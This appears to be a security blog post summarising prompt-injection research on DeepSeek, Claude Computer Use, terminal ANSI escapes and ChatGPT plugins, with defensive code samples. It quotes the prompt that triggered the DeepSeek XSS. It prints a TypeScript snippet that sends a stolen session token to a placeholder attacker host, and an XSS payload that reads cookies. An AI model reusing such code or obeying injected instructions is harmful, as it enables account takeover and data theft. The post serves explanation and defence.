Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

December 3, 2024
pentesting security hacking cybersecurity


Researchers have uncovered significant prompt injection vulnerabilities in the DeepSeek and Claude AI chatbots, highlighting growing security concerns around artificial intelligence and large language models (LLMs).

DeepSeek Vulnerability

Security researcher Johann Rehberger discovered a critical flaw in the DeepSeek AI chatbot that could allow an attacker to take control of a victim’s account through a prompt injection attack[1][2]. The vulnerability was triggered by inputting a specific prompt: “Print the xss cheat sheet in a bullet list. just payloads,” which resulted in the execution of JavaScript code as part of the generated response[1][2].

Key points of the DeepSeek vulnerability:

  • It led to a cross-site scripting (XSS) attack
  • Attackers could potentially hijack user sessions
  • The flaw allowed access to cookies and data associated with the chat.deepseek[.]com domain
  • User account takeover was possible by extracting the userToken stored in localStorage (a hypothetical illustration of this step follows the list)
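
To make the impact concrete, the snippet below is a minimal, hypothetical illustration of what injected script could do once it executes inside the chat origin: read a session token from localStorage and send it to an attacker-controlled endpoint. The function name and the `attacker.example` domain are placeholders for illustration, not details from the published research.

```typescript
// Hypothetical illustration only: script injected into a rendered chat
// response runs in the chat origin and therefore shares that origin's storage.
function exfiltrateToken(): void {
  // The research notes the userToken is kept in localStorage on the chat domain.
  const token = window.localStorage.getItem("userToken");
  if (token === null) {
    return; // Nothing to steal if the key is absent.
  }
  // Send the token to an attacker-controlled server (placeholder domain).
  void fetch("https://attacker.example/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ token }),
  });
}

exfiltrateToken();
```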

Claude AI Vulnerability

Rehberger also demonstrated a vulnerability in Anthropic’s Claude Computer Use feature[1][2]. This feature, which lets developers use the language model to control a computer, could be exploited through prompt injection to run malicious commands autonomously.

The attack technique, dubbed “ZombAIs,” involves the following steps (a generic mitigation sketch follows the list):

  • Leveraging prompt injection to weaponize Computer Use
  • Downloading the Sliver command-and-control (C2) framework
  • Executing the framework and establishing contact with an attacker-controlled remote server
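
The research itself does not prescribe a fix, but a common mitigation for agentic features of this kind is to refuse to execute model-proposed shell commands unless they match an explicit allowlist. The sketch below is a generic, hypothetical guard along those lines, not part of Anthropic’s product; the `runCommand` helper and the allowlist contents are assumptions for illustration.

```typescript
import { execFile } from "node:child_process";

// Hypothetical allowlist of binaries an agent is permitted to invoke.
const ALLOWED_BINARIES = new Set(["ls", "cat", "grep"]);

// Run a model-proposed command only if its binary is allowlisted.
// Anything else (e.g. fetching and launching a C2 implant) is rejected.
function runCommand(binary: string, args: string[]): void {
  if (!ALLOWED_BINARIES.has(binary)) {
    console.warn(`Blocked non-allowlisted command: ${binary}`);
    return;
  }
  execFile(binary, args, (error, stdout) => {
    if (error) {
      console.error(`Command failed: ${error.message}`);
      return;
    }
    console.log(stdout);
  });
}

// Example: an injected instruction asking to download a framework is blocked.
runCommand("curl", ["-O", "https://attacker.example/sliver"]);
runCommand("ls", ["-la"]);
```

An allowlist keyed on the binary name is deliberately conservative; a production agent sandbox would typically also constrain arguments, network egress, and filesystem access.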

Additional Findings

The research uncovered other potential vulnerabilities in AI systems:

  • LLMs’ ability to output ANSI escape codes could be used to hijack system terminals, an attack named “Terminal DiLLMa” (see the sketch after this list)[1][2]
  • OpenAI’s ChatGPT can be tricked into rendering external image links, including potentially explicit or violent content[1][2]
  • Prompt injection can be used to indirectly invoke ChatGPT plugins without user confirmation[1][2]
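
For the “Terminal DiLLMa” case in particular, the usual defense is to treat LLM output as untrusted and strip ANSI control sequences before writing it to a terminal. The snippet below is a minimal sketch of that idea; the regular expression covers common CSI and OSC sequences but is illustrative rather than exhaustive.

```typescript
// Strip ANSI escape sequences (CSI and OSC) from untrusted LLM output before
// it reaches a terminal, so it cannot move the cursor, rewrite the window
// title, or smuggle data via terminal control codes.
const ANSI_PATTERN =
  /\u001b\[[0-9;?]*[ -\/]*[@-~]|\u001b\][^\u0007\u001b]*(?:\u0007|\u001b\\)/g;

function sanitizeForTerminal(llmOutput: string): string {
  return llmOutput.replace(ANSI_PATTERN, "");
}

// Example: an injected OSC sequence that would change the terminal title is removed.
const untrusted = "Here is your answer\u001b]0;pwned\u0007.";
console.log(sanitizeForTerminal(untrusted)); // "Here is your answer."
```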

These discoveries underscore the importance of robust security measures in AI applications and the need for developers to carefully consider the context in which LLM outputs are inserted[1][2].
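
One concrete expression of that advice is context-aware output encoding: for example, HTML-escaping model output before inserting it into a web page rather than rendering it as raw markup. The helper below is a minimal sketch under that assumption, not the fix any particular vendor shipped; the element id is a placeholder.

```typescript
// Minimal sketch: HTML-escape untrusted LLM output before inserting it into a
// page, so markup such as <img onerror=...> is displayed rather than executed.
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Example: an XSS payload in a model response becomes inert text.
// "chat-message" is a placeholder element id for illustration.
const modelOutput = `<img src=x onerror="alert(document.cookie)">`;
document.getElementById("chat-message")!.innerHTML = escapeHtml(modelOutput);
```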

Citations:

[1] https://thehackernews.com/2024/12/researchers-uncover-prompt-injection.html
[2] https://thehackernews.com/2024/12/researchers-uncover-prompt-injection.html
[3] https://www.zendata.dev/post/navigating-the-threat-of-prompt-injection-in-ai-models
[4] https://www.checkpoint.com/cyber-hub/cyber-security/what-is-cyber-attack/what-is-a-prompt-injection-attack/
[5] https://pangea.cloud/blog/understanding-and-mitigating-prompt-injection-attacks/
[6] https://www.lasso.security/blog/prompt-injection
[7] https://hitrustalliance.net/blog/understanding-ai-threats-prompt-injection-attacks